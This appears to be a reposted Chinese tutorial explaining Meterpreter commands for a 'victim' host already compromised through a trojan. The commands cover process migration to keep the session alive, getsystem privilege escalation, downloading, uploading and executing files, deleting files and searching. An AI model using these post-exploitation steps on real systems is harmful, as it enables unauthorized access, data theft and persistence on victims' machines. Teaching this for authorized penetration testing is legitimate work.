【安卓渗透测试系列教程第二期】如何利用meterpreter会话进行渗透

欢迎回来，我的新手黑客

上一期教程中，当我们通过木马获取到一个meterpreter的会话之后，这一期让我们看看这个meterpreter类型的会话让我们可以做什么？

所以我们需要讲解一下关于meterpreter的命令，来帮助大家更好地运用

• help

help

最先知道的命令一定这个，该命令会列出所有可执行的命令并且带有简要的解释

• backgroup

backgroup命令用来隐藏当前的会话，那为什么需要隐藏当前的会话呢？原因可能有两个
一个是你想使用另一个msf的模块，该模块中设置的参数有session选项
另一个是可能获取到了很多会话，你想切换会话，需要首先隐藏会话，再切换会话

• session -i id

        在隐藏会话之后，session命令用来说明你想进入哪一个会话

session -i **id**

• ps

        ps命令用来查看Victim主机上正在运行的进程服务

• getuid

        getuid命令用来查看该进程的Username

• getpid

        getpid命令用来查看该进程服务的id

• migrate

  migrate pid
  

  migrate命令用来切换metrepreter会话依赖的进程服务，该命令可以有效防止因为Victim用户关闭进程而导致meterpreter会话失效 getuid getpid

• getsystem

         getsystem命令用来提权，获取管理员等级的权限 getuid

• pwd

        pwd命令用来显示当前的工作目录，就是显示你当前处于的位置，比如Victim在桌面上开启了进程，使你获得meterpreter会话，那当前的工作目录就应该是桌面

• cd

  cd 'C:'
  

  cd命令用来切换工作目录，该命令的意思就是切换到C盘的根目录下，此处需要注意是反斜杠 pwd

• cat

  cat demo.txt
  

  cat命令用来查看文件内容，该命令的意思就是查看demo这个文本文件的内容

• edit

  edit demo.txt
  

  edit命令用来编辑文件内容，该命令的意思就是编辑demo这个文本文件的内容

• download

  download C:\demo.txt /root/
  

  download命令用来将Victim主机中的文件下载到本地，命令格式为 download 需要下载的内容 下载到本地的路径

• rm

  rm demo.txt
  

  rm命令用来删除文件，和del一样，该命令的意思就是删除demo这个文本文件

• upload

  upload /root/demo.txt C:\
  

  upload命令用来将本地的文件上传到Victim主机上，命令格式为upload 需要上传的内容 上传到Victim主机上的路径

• execute

  execute -f ip.exe
  

  execute命令用来执行Victim主机上的可执行文件(.exe)，该命令的意思就是执行ip.exe这个软件

• kill

  kill pid
  

  kill命令用来关闭进程

• search

  search -f *demo*
  

  search命令用来在Victim主机上查找某些特定的文件，该命令的意思是，查找所有文件名包含demo的文件

---

原创不易，帮我点点右下角的“在看”吧，欢迎转发跟同行分享

原文始发于微信公众号（Kali渗透测试教程）：【安卓渗透测试系列教程第二期】如何利用meterpreter会话进行渗透